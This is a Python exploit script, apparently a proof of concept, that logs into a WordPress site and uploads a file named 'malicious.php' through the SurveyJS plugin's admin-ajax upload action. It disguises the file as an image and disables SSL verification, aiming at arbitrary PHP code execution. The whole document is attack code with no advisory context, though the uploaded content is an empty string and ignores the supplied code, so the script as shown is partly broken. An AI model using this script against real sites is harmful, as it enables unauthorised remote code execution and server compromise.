import requests import argparse import json from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disable SSL warnings requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def upload_file(url, username, password, php_code): # Start a session session = requests.Session() # Login data login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': url + '/wp-admin/', 'testcookie': '1' } # Perform login login_url = f"{url}/wp-login.php" response = session.post(login_url, data=login_data, verify=False) # Check if login was successful by looking for the cookie if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): print("Login successful.") # Prepare the file upload files = { 'action': (None, 'SurveyJS_UploadFiles'), 'file': ('malicious.php', f'', 'image/jpeg') } # Upload the file upload_url = f"{url}/wp-admin/admin-ajax.php" upload_response = session.post(upload_url, files=files, verify=False) # Check the response if upload_response.status_code == 200: print("File uploaded successfully.") try: data = upload_response.json() print(data["malicious.php"]) except json.JSONDecodeError: print("Failed to parse JSON response.") print("Response text:", upload_response.text) else: print("Failed to upload file. Status code:", upload_response.status_code) else: print("Login failed. Check your credentials.") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Upload a PHP file to a WordPress site.') parser.add_argument('url', type=str, help='The URL of the WordPress site (e.g., http://example.com)') parser.add_argument('username', type=str, help='Your WordPress username') parser.add_argument('password', type=str, help='Your WordPress password') parser.add_argument('--code', type=str, default='Arbitrary PHP code execution', help='PHP code to execute') args = parser.parse_args() upload_file(args.url, args.username, args.password, args.code)